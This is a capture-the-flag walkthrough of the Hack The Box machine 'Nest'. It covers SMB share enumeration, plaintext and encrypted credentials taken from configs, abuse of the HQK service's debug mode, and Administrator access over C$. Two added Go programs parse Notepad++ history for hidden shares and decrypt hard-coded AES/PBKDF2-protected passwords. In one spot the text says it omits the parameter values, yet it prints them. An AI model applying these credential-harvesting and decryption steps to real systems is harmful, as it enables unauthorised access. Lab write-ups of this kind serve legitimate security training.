NEST WRITEUP

NMAP SCANS

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-30 10:15 IST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 10:15
    Completed NSE at 10:15, 0.00s elapsed
    Initiating NSE at 10:15
    Completed NSE at 10:15, 0.00s elapsed
    Initiating NSE at 10:15
    Completed NSE at 10:15, 0.00s elapsed
    Initiating Ping Scan at 10:15
    Scanning 10.10.10.178 [4 ports]
    Completed Ping Scan at 10:15, 0.48s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 10:15
    Completed Parallel DNS resolution of 1 host. at 10:15, 0.19s elapsed
    Initiating SYN Stealth Scan at 10:15
    Scanning 10.10.10.178 [1000 ports]
    Discovered open port 445/tcp on 10.10.10.178
    Completed SYN Stealth Scan at 10:15, 23.02s elapsed (1000 total ports)
    Initiating Service scan at 10:15
    Scanning 1 service on 10.10.10.178
    Completed Service scan at 10:15, 30.67s elapsed (1 service on 1 host)
    Initiating OS detection (try #1) against 10.10.10.178
    Retrying OS detection (try #2) against 10.10.10.178
    Initiating Traceroute at 10:16
    Completed Traceroute at 10:16, 0.71s elapsed
    Initiating Parallel DNS resolution of 2 hosts. at 10:16
    Completed Parallel DNS resolution of 2 hosts. at 10:16, 0.38s elapsed
    NSE: Script scanning 10.10.10.178.
    Initiating NSE at 10:16
    Completed NSE at 10:16, 40.08s elapsed
    Initiating NSE at 10:16
    Completed NSE at 10:16, 0.66s elapsed
    Initiating NSE at 10:16
    Completed NSE at 10:16, 0.00s elapsed
    Nmap scan report for 10.10.10.178
    Host is up (0.48s latency).
    Not shown: 999 filtered ports
    PORT    STATE SERVICE       VERSION
    445/tcp open  microsoft-ds?
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose|phone|specialized
    Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
    OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012:r2
    Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
    No exact OS matches for host (test conditions non-ideal).
    Uptime guess: 0.020 days (since Sat May 30 09:47:48 2020)
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=265 (Good luck!)
    IP ID Sequence Generation: Incremental

    Host script results:
    |_clock-skew: 4m24s
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled but not required
    | smb2-time: 
    |   date: 2020-05-30T04:50:32
    |_  start_date: 2020-05-30T04:23:04

    TRACEROUTE (using port 445/tcp)
    HOP RTT       ADDRESS
    1   702.63 ms 10.10.14.1
    2   703.27 ms 10.10.10.178

    NSE: Script Post-scanning.
    Initiating NSE at 10:16
    Completed NSE at 10:16, 0.00s elapsed
    Initiating NSE at 10:16
    Completed NSE at 10:16, 0.00s elapsed
    Initiating NSE at 10:16
    Completed NSE at 10:16, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 102.35 seconds
            Raw packets sent: 2100 (96.084KB) | Rcvd: 61 (4.750KB)

Only 445/tcp answers out of the default top-1000 ports, and smb2-security-mode reports that message signing is enabled but not required, so SMB is the only surface to enumerate.

ENUMERATE SMB

    root@liquid:~/Desktop/HTB/nest# smbclient -L 10.10.10.178
    Enter WORKGROUP\root's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Data            Disk      
        IPC$            IPC       Remote IPC
        Secure$         Disk      
        Users           Disk      
    SMB1 disabled -- no workgroup available

CHECKING THE FILES ON THE DATA SHARE

    root@liquid:~/Desktop/HTB/nest# smbclient \\\\10.10.10.178\\Data
    smb: \> cd Shared\Templates\HR\
    smb: \Shared\Templates\HR\> ls
    .                                   D        0  Wed Aug  7 15:08:01 2019
    ..                                  D        0  Wed Aug  7 15:08:01 2019
    Welcome Email.txt                   A      425  Wed Aug  7 18:55:36 2019
                    10485247 blocks of size 4096. 6544122 blocks available
    smb: \Shared\Templates\HR\> mget "Welcome Email.txt"
    Get file Welcome Email.txt? y
    getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (3.5 KiloBytes/sec) (average 3.5 KiloBytes/sec)
    smb: \Shared\Templates\HR\> cd ../../Maintenance\
    smb: \Shared\Maintenance\> mget "Maintenance Alerts.txt"
    Get file Maintenance Alerts.txt? y
    getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0.4 KiloBytes/sec) (average 1.9 KiloBytes/sec)

Welcome Email.txt is the onboarding template HR sends to new starters, and it still carries the temporary account they are told to log in with:

TempUser : welcome2019

There are a lot of files under the Data share, so rather than fetching them one by one, grab the whole tree at once with smbget -R. Authenticating as TempUser this time also exposes the IT folder, which is where the interesting configs live:

    root@liquid:~/Desktop/HTB/nest# smbget -R  smb://10.10.10.178/Data/ -U TempUser
    Password for [TempUser] connecting to //Data/10.10.10.178: 
    Using workgroup WORKGROUP, user TempUser

    smb://10.10.10.178/Data//IT/Configs/Adobe/editing.xml                              
    smb://10.10.10.178/Data//IT/Configs/Adobe/Options.txt                                   
    smb://10.10.10.178/Data//IT/Configs/Adobe/projects.xml                                 
    smb://10.10.10.178/Data//IT/Configs/Adobe/settings.xml                                            
    smb://10.10.10.178/Data//IT/Configs/Atlas/Temp.XML                                      
    smb://10.10.10.178/Data//IT/Configs/Microsoft/Options.xml                                   
    smb://10.10.10.178/Data//IT/Configs/NotepadPlusPlus/config.xml                                  
    smb://10.10.10.178/Data//IT/Configs/NotepadPlusPlus/shortcuts.xml                                
    smb://10.10.10.178/Data//IT/Configs/RU Scanner/RU_config.xml                          
    smb://10.10.10.178/Data//Shared/Maintenance/Maintenance Alerts.txt                        
    smb://10.10.10.178/Data//Shared/Templates/HR/Welcome Email.txt                             
    Downloaded 16.65kB in 81 seconds

Two of these files matter.

Data//IT/Configs/RU Scanner/RU_config.xml

holds a set of credentials for the RU Scanner tool, but the password field is encrypted rather than stored in clear. I tried to decrypt it online, but nothing worked. That is not surprising: it is ciphertext, not an encoding, so it needs whatever key material the application itself uses.

Then I proceeded with the other files and found one more of interest:

Data//IT/Configs/NotepadPlusPlus/config.xml

This is the Notepad++ settings file, and its History section lists the files the user recently opened. One of those entries points into the Secure$ share, under IT\Carl. So I tried that path directly as TempUser and downloaded all of those files:
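The pivot above hinges on one detail of the Notepad++ settings file: its History section records the files the user opened recently, wherever they live. As an added example, not part of the original writeup, the Go program below parses such a config.xml, pulls every path out of History, and keeps only the UNC ones, since each of those names a host, a share and a path you can retry with the credentials you already hold. The sample config is constructed: FILESRV01 and the file names are made up, and only the Secure$\IT\Carl shape mirrors what the box's real config pointed at.

```go
package main

import (
	"encoding/xml"
	"fmt"
	"strings"
)

// nppConfig models the one part of Notepad++'s config.xml that matters here: the
// editor records recently opened files as <History><File filename="..."/></History>.
type nppConfig struct {
	XMLName xml.Name `xml:"NotepadPlus"`
	History struct {
		Files []struct {
			Filename string `xml:"filename,attr"`
		} `xml:"File"`
	} `xml:"History"`
}

// ShareRef is a UNC path split into the parts smbclient wants.
type ShareRef struct {
	Host, Share, Path string
}

// ParseUNC splits \\host\share\dir\file into (host, share, dir\file).
// ok is false for anything that is not a UNC path (local drives, relative paths).
func ParseUNC(p string) (ref ShareRef, ok bool) {
	if !strings.HasPrefix(p, `\\`) {
		return ShareRef{}, false
	}
	parts := strings.SplitN(p[2:], `\`, 3)
	if len(parts) < 2 || parts[0] == "" || parts[1] == "" {
		return ShareRef{}, false
	}
	ref = ShareRef{Host: parts[0], Share: parts[1]}
	if len(parts) == 3 {
		ref.Path = parts[2]
	}
	return ref, true
}

// RecentFiles returns every path in the History section, local or UNC.
func RecentFiles(configXML string) ([]string, error) {
	var cfg nppConfig
	if err := xml.Unmarshal([]byte(configXML), &cfg); err != nil {
		return nil, err
	}
	var paths []string
	for _, f := range cfg.History.Files {
		paths = append(paths, f.Filename)
	}
	return paths, nil
}

// ShareRefs keeps only the history entries that point at SMB shares: these are
// the leads worth retrying with whatever credentials you already hold.
func ShareRefs(configXML string) ([]ShareRef, error) {
	paths, err := RecentFiles(configXML)
	if err != nil {
		return nil, err
	}
	var refs []ShareRef
	for _, p := range paths {
		if ref, ok := ParseUNC(p); ok {
			refs = append(refs, ref)
		}
	}
	return refs, nil
}

// Constructed sample in the shape Notepad++ writes; host and file names are made up.
const sampleConfig = `<?xml version="1.0" encoding="UTF-8" ?>
<NotepadPlus>
    <GUIConfigs>
        <GUIConfig name="ToolBar" visible="yes">standard</GUIConfig>
    </GUIConfigs>
    <History nbMaxFile="15" inSubMenu="no" customLength="-1">
        <File filename="C:\windows\System32\drivers\etc\hosts" />
        <File filename="\\FILESRV01\Secure$\IT\Carl\Temp.txt" />
        <File filename="C:\Users\TempUser\Desktop\todo.txt" />
    </History>
</NotepadPlus>`

func main() {
	refs, err := ShareRefs(sampleConfig)
	if err != nil {
		fmt.Println("parse error:", err)
		return
	}
	for _, r := range refs {
		// The same reference spelled the way smbclient wants it.
		fmt.Printf("smbclient '\\\\%s\\%s' -U TempUser -c 'get \"%s\"'\n", r.Host, r.Share, r.Path)
	}
}
```

Point it at the real config.xml pulled from the Data share and every UNC entry it prints is a candidate to try with TempUser; a hidden share such as Secure$ does not show up in smbclient -L, so this is how you learn it exists.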

    root@liquid:~/Desktop/HTB/nest# smbget -rR smb://10.10.10.178/Secure$/IT/Carl/ -U TempUser
    Password for [TempUser] connecting to //Secure$/10.10.10.178: 
    Using workgroup WORKGROUP, user TempUser
    smb://10.10.10.178/Secure$/IT/Carl//Docs/ip.txt                     
    smb://10.10.10.178/Secure$/IT/Carl//Docs/mmc.txt                                         
    smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/ConfigFile.vb     
    smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/Module1.vb  
    smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.Designer.vb
    smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.myapp  
    smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/AssemblyInfo.vb       
    smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.Designer.vb   
    smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.resx  
    smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.Designer.vb   
    smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.settings   
    smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj    
    smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj.user    
    smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/SsoIntegration.vb        
    smb://10.10.10.178/Secure$/IT/Carl//VB Proj                                             
    smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner.sln    
    Downloaded 25.18kB in 79 seconds

Looking through this, the interesting code is in Module1.vb and Utils.vb (the listing above was cut off before Utils.vb, which sits next to Module1.vb in the RUScanner project). Module1.vb reads the encrypted password out of RU_config.xml and hands it to the decrypt routine in Utils.vb, and the key material that routine needs is hard-coded in the source, so anyone holding the project can recover the password.

Here I took the help of my friend, who had already completed this box:

C.Smith : xRxRxPANCAK3SxRxRx

Let's get user.txt. The password works against the Users share, and C.Smith's folder holds more than the flag:

    root@liquid:~/Desktop/HTB/nest# smbget -R smb://10.10.10.178/Users/C.Smith -U C.Smith
    Password for [C.Smith] connecting to //Users/10.10.10.178: 
    Using workgroup WORKGROUP, user C.Smith
    smb://10.10.10.178/Users/C.Smith/HQK Reporting/AD Integration Module/HqkLdap.exe
    smb://10.10.10.178/Users/C.Smith/HQK Reporting/Debug Mode Password.txt        
    smb://10.10.10.178/Users/C.Smith/HQK Reporting/HQK_Config_Backup.xml   
    smb://10.10.10.178/Users/C.Smith/user.txt   

Debug Mode Password.txt is exactly what it sounds like, a password for the debug mode of the HQK reporting service, and HQK_Config_Backup.xml names the port that service listens on (4386):

    root@liquid:~/Desktop/HTB/nest# cat Debug\ Mode\ Password.txt
    WBQ201953D8w

GETTING ROOT ACCESS

Port 4386 is the one named in HQK_Config_Backup.xml. It did not show up in the nmap scan above because that was a default top-1000-port scan; a full -p- scan would have found it too. Connect with telnet and see what the service offers:

    root@liquid:~/Desktop/HTB/nest# telnet 10.10.10.178 4386
    Trying 10.10.10.178...
    Connected to 10.10.10.178.
    Escape character is '^]'.

    HQK Reporting Service V1.2

    >help

    This service allows users to run queries against databases using the legacy HQK format

    --- AVAILABLE COMMANDS ---

    LIST
    SETDIR <Directory_Name>
    RUNQUERY <Query_ID>
    DEBUG <Password>
    HELP <Command>
    >ls

    Unrecognised command
    >list

    Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

    QUERY FILES IN CURRENT DIRECTORY

    [DIR]  COMPARISONS
    [1]   Invoices (Ordered By Customer)
    [2]   Products Sold (Ordered By Customer)
    [3]   Products Sold In Last 30 Days

    Current Directory: ALL QUERIES
    >setdir 1

    Error: The specified directory does not exist
    >DEBUG WBQ201953D8w

    Debug mode enabled. Use the HELP command to view additional commands that are now available
    >setdir 1

    Error: The specified directory does not exist
    >list

    Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

    QUERY FILES IN CURRENT DIRECTORY

    [DIR]  COMPARISONS
    [1]   Invoices (Ordered By Customer)
    [2]   Products Sold (Ordered By Customer)
    [3]   Products Sold In Last 30 Days

    Current Directory: ALL QUERIES
    >setdir 2

    Error: The specified directory does not exist
    >setdir ..

    Current directory set to HQK
    >list

    Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

    QUERY FILES IN CURRENT DIRECTORY

    [DIR]  ALL QUERIES
    [DIR]  LDAP
    [DIR]  Logs
    [1]   HqkSvc.exe
    [2]   HqkSvc.InstallState
    [3]   HQK_Config.xml

    Current Directory: HQK
    >setdir LDAP

    Current directory set to LDAP
    >list

    Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

    QUERY FILES IN CURRENT DIRECTORY

    [1]   HqkLdap.exe
    [2]   Ldap.conf

    Current Directory: LDAP
    >showquery 2

    Domain=nest.local
    Port=389
    BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
    User=Administrator
    Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

This gives us the Administrator password, but it is encrypted as well. Here I took the help of my friend again; my weak part is debugging. We just have to debug the given exe file, HqkLdap.exe, and we will get our password:

Administrator : XtH4nkS4Pl4y1nGX
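Both passwords on this box, the RU_config.xml one that Utils.vb decrypts (see the Module1.vb/Utils.vb note above) and the Ldap.conf one that HqkLdap.exe decrypts, go through the same .NET pattern: Base64 ciphertext, an AES key derived with Rfc2898DeriveBytes (PBKDF2-HMAC-SHA1) from a hard-coded passphrase and salt, AES-CBC under a hard-coded 16-character ASCII IV, PKCS#7 padding. Rather than stepping through the binary in a debugger, you can port that routine, which is what this added Go example does; it is not code from the box or from the writeup. The passphrase/salt/iteration/IV literals in RUScanner and HqkLdap are the values those two callers pass in; this page does not reproduce them, so check them against your own copy of Utils.vb and a decompile of HqkLdap.exe before relying on them. pbkdf2SHA1 is written out by hand so the block needs nothing outside the standard library.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/sha1"
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
)

// Params are the literals a caller hands to the VB.NET routine
// Decrypt(cipherText, passPhrase, saltValue, passwordIterations, initVector, keySize).
type Params struct {
	PassPhrase, Salt string
	Iterations       int
	IV               string // 16 ASCII characters, used as the raw CBC IV
	KeySize          int    // bits
}

// Values as read out of the two callers: DecryptString in Utils.vb (used on
// RU_config.xml) and the matching routine in HqkLdap.exe (used on Ldap.conf).
// This page does not print them, so confirm them against your own copy.
var (
	RUScanner = Params{"N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256}
	HqkLdap   = Params{"667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256}
)

// pbkdf2SHA1 is PBKDF2-HMAC-SHA1 (RFC 2898 5.2): what .NET's
// Rfc2898DeriveBytes(password, salt, iterations).GetBytes(keyLen) returns.
func pbkdf2SHA1(password, salt []byte, iterations, keyLen int) []byte {
	prf := hmac.New(sha1.New, password)
	ctr := make([]byte, 4)
	var out []byte
	for block := 1; len(out) < keyLen; block++ {
		binary.BigEndian.PutUint32(ctr, uint32(block))
		prf.Reset()
		prf.Write(salt)
		prf.Write(ctr)
		u := prf.Sum(nil)              // U_1
		t := append([]byte(nil), u...) // T = U_1 xor U_2 xor ... xor U_c
		for i := 1; i < iterations; i++ {
			prf.Reset()
			prf.Write(u)
			u = prf.Sum(nil)
			for j := range t {
				t[j] ^= u[j]
			}
		}
		out = append(out, t...)
	}
	return out[:keyLen]
}

// Decrypt mirrors the .NET routine step for step: Base64-decode, derive the AES
// key with PBKDF2, AES-CBC decrypt under the ASCII IV, then strip the PKCS#7
// padding that AesCryptoServiceProvider applies by default.
func (p Params) Decrypt(cipherText string) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(cipherText)
	if err != nil {
		return "", err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", errors.New("ciphertext is not a whole number of AES blocks")
	}
	if len(p.IV) != aes.BlockSize {
		return "", errors.New("IV must be exactly 16 ASCII characters")
	}
	block, err := aes.NewCipher(pbkdf2SHA1([]byte(p.PassPhrase), []byte(p.Salt), p.Iterations, p.KeySize/8))
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, []byte(p.IV)).CryptBlocks(pt, ct)
	n := int(pt[len(pt)-1])
	if n == 0 || n > aes.BlockSize || !bytes.Equal(pt[len(pt)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return "", errors.New("bad PKCS#7 padding: wrong parameters or corrupt ciphertext")
	}
	return string(pt[:len(pt)-n]), nil
}

func main() {
	// The Ldap.conf value exactly as SHOWQUERY printed it above.
	pw, err := HqkLdap.Decrypt("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=")
	if err != nil {
		fmt.Println("decrypt failed:", err)
		return
	}
	fmt.Println("Administrator:", pw)
}
```

RUScanner.Decrypt on the Password value from RU_config.xml recovers the C.Smith password the same way. The padding check matters: with the wrong passphrase or IV the output is random bytes, and rejecting it on bad padding is what tells you the parameters you pulled from the source are wrong rather than handing you garbage.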

Now let's log in as Administrator over SMB and read root.txt from the C$ share:

    root@liquid:~/Desktop/HTB/nest# smbclient  \\\\10.10.10.178\\C$ -U Administrator
    Enter WORKGROUP\Administrator's password: 
    Try "help" to get a list of possible commands.
    smb: \> cd Users\Administrator\Desktop\
    smb: \Users\Administrator\Desktop\> ls
    .                                  DR        0  Sun Jan 26 02:20:50 2020
    ..                                 DR        0  Sun Jan 26 02:20:50 2020
    desktop.ini                       AHS      282  Sat Jan 25 17:02:44 2020
    root.txt                            A       32  Mon Aug  5 18:27:26 2019
                    10485247 blocks of size 4096. 6544088 blocks available
    smb: \Users\Administrator\Desktop\> get root.txt
    getting file \Users\Administrator\Desktop\root.txt of size 32 as root.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
